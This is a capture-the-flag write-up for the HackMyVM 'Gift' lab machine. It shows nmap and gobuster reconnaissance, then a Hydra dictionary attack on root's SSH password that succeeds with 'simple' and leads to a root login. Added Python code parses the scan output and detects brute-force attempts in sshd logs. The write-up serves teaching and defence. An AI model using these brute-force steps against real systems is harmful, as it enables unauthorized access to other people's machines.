In this write-up, I will guide you through the steps I took to complete the HackMyVM - Gift CTF challenge. The objective is to gain root access to the target machine by exploiting identified vulnerabilities. Check out the video (update this).
TL;DR
Reconnaissance
Network/Port Scanning (Nmap)
Command:
nmap -sV -sC -vv -oA gift -p- 172.16.100.13
Explanation:
nmap: Network and port scanner used to discover which hosts and services are running.
-sV: Perform version detection of the services found.
-sC: Scan using the default NSE scripts.
-vv: Very verbose output.
-oA gift: Save the output in all three formats (normal, XML and grepable) with the base filename "gift".
-p-: Scan all 65535 TCP ports instead of the default top 1000.
172.16.100.13: IP address of the Gift VM on my network.
Output:
# Nmap 7.95 scan initiated Fri Sep 20 22:24:51 2024 as: nmap -sC -sV -vv -oA gift -p- 172.16.100.13
Nmap scan report for 172.16.100.13
Host is up, received conn-refused (0.012s latency).
Scanned at 2024-09-20 22:25:01 PDT for 12s
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCwvhffyA9Z9cqVhVe0GuixD3HU4XTTTf1CQnN9PbBFckBHxypueBuI9N0WkAOvZLGKI9JkjxzxgQ5vIdzr83IoyrbUBw/nFLwRzsVhBM+JMUqSZ9OHMhg8qQpFIAcdNprgB40DgER+hMrU+yUAqwbNISQC/aE+DCdHNjNqFw6Pf2/+7bp8CbntJAxdh4DtHZAmneKy/2JGKzpJcDxU2L8B5pY9uvajkKVSDXVFe1bJZV9ZirBalgYGgke4sTz5kpIeT3CyEefJie6r7wloIH4CiWtyXDsYGMt5mD2UBCa4GDQaJO5U9F0qjYFa8YdVCOTWdyQvOlFOgqydvAl0LRf6tZKNqVOb/peNf9K8Ucrg4n+IevaGmivhyGXnwbuCuHN1QH/9dzbNbnZwXn2GYtwYdjBy6AmHRX9Jcsdorj4b/r+eCEPvFIm4ESc7qsn4ShtQr9R8fTgrWArJkfLKhr4KdwMZoifAbjrR/G/lj524dS20mbbVLdhjy/8rH/42dN0=
| 256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEK4YVSVfGAFEwIJqSel1n33seZLyN+AgGU4rUu5Xrf2LnzQmntddLtLtc1Soqu6SpOi/A6vefQzI+a867uJ3Tw=
| 256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAID5tIogpq9Eky8MaFF10Cq48d+nTRmXk0OwWl8J8CNIq
80/tcp open http syn-ack nginx
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 20 22:25:13 2024 -- 1 IP address (1 host up) scanned in 23.22 seconds
Findings:
We see that there is a web server running on port 80.
Let's check out the web server and in the background we can run gobuster to brute force web directories.
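The scan output above is in nmap's normal format. As an added example (not part of the original write-up), the parser below turns that format into an exposure inventory, one record per port line with any ssh-hostkey fingerprints attached; the sample input is an excerpt of the scan above with the base64 key blobs left out.

```python
import re
from typing import Dict, List

# Excerpt of the nmap normal-format output shown above (hostkey base64 lines dropped).
NMAP_OUTPUT = """\
Nmap scan report for 172.16.100.13
Host is up, received conn-refused (0.012s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
| 256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
80/tcp open http syn-ack nginx
|_http-title: Site doesn't have a title (text/html).
"""

# "22/tcp open ssh syn-ack OpenSSH 8.3 (protocol 2.0)" -> port, proto, state, service, reason, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(\S+)\s*(.*)$")
# "| 3072 2c:1b:...:95 (RSA)" -> bits, MD5 fingerprint (16 hex bytes = 47 chars), algorithm
HOSTKEY_RE = re.compile(r"^\|\s+(\d+)\s+([0-9a-f:]{47})\s+\((\w+)\)$")


def parse_nmap(text: str) -> List[Dict]:
    """Return one dict per port line, with ssh-hostkey fingerprints attached to their port."""
    ports: List[Dict] = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, reason, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "reason": reason,
                          "version": version.strip(), "hostkeys": []})
            continue
        m = HOSTKEY_RE.match(line)
        if m and ports:  # NSE script output always follows the port line it belongs to
            bits, fingerprint, algo = m.groups()
            ports[-1]["hostkeys"].append({"bits": int(bits), "algo": algo,
                                          "fingerprint": fingerprint})
    return ports


def open_services(ports: List[Dict]) -> Dict[int, str]:
    """Map each open port number to its service name, e.g. {22: 'ssh', 80: 'http'}."""
    return {p["port"]: p["service"] for p in ports if p["state"] == "open"}
```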
Directory Brute-forcing (Gobuster)
Command:
gobuster dir -u http://172.16.100.13 -w /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
Note: I have set up an alias to run gobuster inside a Docker container.
Alias: alias gobuster='docker run -it --rm --name gobuster -v /home/ayush/Tools/SecLists/:/SecLists ghcr.io/oj/gobuster'
Explanation:
dir: Mode of operation indicating directory/file enumeration.
-u http://172.16.100.13: Base URL of the target web server to scan.
-w /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt: Path of word list to use.
-x php,txt,html: Search for the PHP, HTML and TXT file extensions.
Output:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.16.100.13
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 57]
Progress: 882236 / 882240 (100.00%)
===============================================================
Finished
===============================================================
Findings:
Nothing beyond the landing page (/index.html) is found here.
Visiting Web Page (Port 80)
This is a normal landing page with no special features. Let's check the source code for any hints.
Source code of webpage:
The author of the box says that the box is really simple: there are no running services we can exploit, and the web server only serves a static page. So the simplest way to get access to the system is brute forcing.
Brute Forcing
SSH Root Password Brute Force (Hydra)
Let's try to find the password of the root user on the box using Hydra and the rockyou wordlist.
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-20 22:33:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://172.16.100.13:22/
[22][ssh] host: 172.16.100.13 login: root password: simple
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-20 22:34:11
We found the password with our brute force attack, and we can use it to log in as root via SSH.
Command:
ssh root@172.16.100.13
Output:
IM AN SSH SERVER
gift:~# ls
root.txt user.txt
gift:~#
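The Hydra run above succeeds because root can log in over SSH with a dictionary password, and it leaves a very characteristic trace in sshd's logs: a burst of "Failed password" lines from one client followed by an "Accepted password" for root. As an added example (not part of the original write-up), the detector below reads such log lines and raises alerts for the failure burst, for a success that follows it, and for any root password login at all. The auth.log lines are constructed to mirror the attack above; the log year is assumed to be 2024 because syslog timestamps omit it.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed OpenSSH auth.log lines modelled on the Hydra run above:
# repeated password failures for root from one client, then a success.
AUTH_LOG = """\
Sep 20 22:33:56 gift sshd[1201]: Failed password for root from 172.16.100.1 port 51010 ssh2
Sep 20 22:33:56 gift sshd[1202]: Failed password for root from 172.16.100.1 port 51011 ssh2
Sep 20 22:33:57 gift sshd[1203]: Failed password for root from 172.16.100.1 port 51012 ssh2
Sep 20 22:33:57 gift sshd[1204]: Failed password for root from 172.16.100.1 port 51013 ssh2
Sep 20 22:33:58 gift sshd[1205]: Failed password for root from 172.16.100.1 port 51014 ssh2
Sep 20 22:34:10 gift sshd[1290]: Accepted password for root from 172.16.100.1 port 51100 ssh2
Sep 20 22:40:00 gift sshd[1400]: Accepted publickey for ayush from 172.16.100.2 port 40000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def detect_bruteforce(log: str, threshold: int = 5, window_s: int = 60):
    """Return (alert, source_ip, user) tuples in the order they fire."""
    fails = defaultdict(list)  # source ip -> timestamps of recent failed logins
    alerts = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime("2024 " + m["ts"], "%Y %b %d %H:%M:%S")  # year assumed
        ip, user = m["ip"], m["user"]
        # keep only failures inside the sliding window ending at this line
        recent = [t for t in fails[ip] if (ts - t).total_seconds() <= window_s]
        if m["result"] == "Failed":
            recent.append(ts)
            fails[ip] = recent
            if len(recent) == threshold:  # fire once when the burst crosses the threshold
                alerts.append(("bruteforce", ip, user))
        else:
            if len(recent) >= threshold:  # success right after a burst: likely guessed
                alerts.append(("success_after_bruteforce", ip, user))
            if user == "root" and m["method"] == "password":
                alerts.append(("root_password_login", ip, user))
    return alerts
```

The last alert is worth raising even without a preceding burst: the fix for this box is simply PermitRootLogin no (or key-only authentication) in sshd_config, and the alert tells you whether that setting is actually in effect.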